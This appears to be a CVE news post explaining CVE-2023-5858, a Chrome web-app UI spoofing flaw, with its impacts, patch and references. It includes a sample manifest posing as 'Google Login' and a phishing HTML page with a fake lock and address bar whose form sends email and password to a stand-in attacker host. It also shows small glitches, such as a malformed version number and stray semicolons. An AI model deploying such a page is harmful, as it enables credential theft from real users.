CVE CyberSecurity Database News

CVE-2023-5858 - How a Simple Web Page Could Trick You in Google Chrome (with Exploit Details)

Poster -

In late 2023, Google Chrome faced a security issue tracked as CVE-2023-5858. This problem was found in the WebApp Provider, a component inside Chrome that helps turn web pages into powerful applications. The inappropriate implementation in this feature let attackers create special web pages that confuse users and obfuscate visual security indicators—like site icons and security prompts. This bug was patched in Chrome version 119..6045.105, but many users have never heard the details or seen a demonstration.

In this post, we'll look at what went wrong, how it could have affected real users, and even show some code. We'll wrap up with references to the original reports.

What is the WebApp Provider?

The WebApp Provider in Chrome lets users "install" web pages as standalone apps, which then look and feel like native applications. For example, you can install Gmail or Twitter as an app from your browser.

What Did CVE-2023-5858 Actually Do?

Because of a flaw in how Chrome handled certain HTML and UI cues, a malicious website could create an app that disguises security indicators. This means a bad actor could hide or fake things like site origins, padlocks, or permission prompts—things you rely on to know you're safe.

The bug is rated "Low" severity by the Chromium team because the exploit doesn't directly leak info or allow code execution. But, it can mislead users—a vital part of security.

Create a Malicious Web App Manifest

An attacker drafts a manifest file (which Chrome uses to install apps) with fake or misleading information.

2. Craft Misleading HTML/UI
The attacker builds an HTML page that mimics Chrome's own UI elements, hiding true security indicators (like the real address bar or icon).

Mislead User with Fake Security Prompts

The installed app can now show fake permission dialogs or falsified security badges, leading the user to trust the malicious app.

Below is an example of a manifest used to disguise app identity

// manifest.json
{
  "name": "Login Portal",
  "short_name": "Google Login",
  "start_url": "/phishing.html",
  "scope": "/",
  "icons": [{
    "src": "data:image/svg+xml;base64,...",  // Fake Google icon
    "sizes": "192x192",
    "type": "image/png"
  }],
  "display": "standalone",
  "background_color": "#4285f4",
  "theme_color": "#ffffff"
}

The following HTML fakes a secure lock icon and address bar

<div style="background:#f1f3f4; padding:10px; display:flex; align-items:center;">
  <img src="https://img.icons8.com/color/32/000000/lock--v1.png"; style="margin-right:8px;">
  <span style="color:#555; font-family:monospace;">https://accounts.google.com</span>;
</div>
<h2>Sign in to your Google Account</h2>
<!-- Fake form to steal credentials -->
<form action="https://attacker.com/steal"; method="POST">
  <input type="email" name="email" placeholder="Email">

  <input type="password" name="pass" placeholder="Password">

  <button type="submit">Login</button>
</form>

These snippets install an app that looks and feels just like a real Google login page complete with fake HTTPS indicators.

Real-World Impacts

- Phishing: Users could be fooled into thinking they are on a trusted site or app, entering credentials into a lookalike page.
- False Security: Users may grant permissions (camera, microphone, location) due to trust in the fake UI.
- Reputation Damage: Even low-severity, these misdirections chip away at user confidence in browser security cues.

Patched in: Chrome 119..6045.105

- Patch approach: Fix UI separation between app content and browser chrome, making it harder to visually spoof security elements.

References and Further Reading

- Chromium CVE-2023-5858 Issue Tracker
- Official Chrome Releases Blog
- Security Release Notes for Chrome 119
- Web App Manifest Documentation (MDN)

Conclusion

While CVE-2023-5858 didn't let hackers run code or steal your data directly, it opened the door for clever phishing and UI tricks. It’s a good reminder that security is as much about clear communication as it is about technology. With browsers blending apps and sites closer than ever, keeping your browser updated and paying attention to UI details is more important than ever.

Timeline

Published on: 11/01/2023 18:15:10 UTC
Last modified on: 11/14/2023 03:15:12 UTC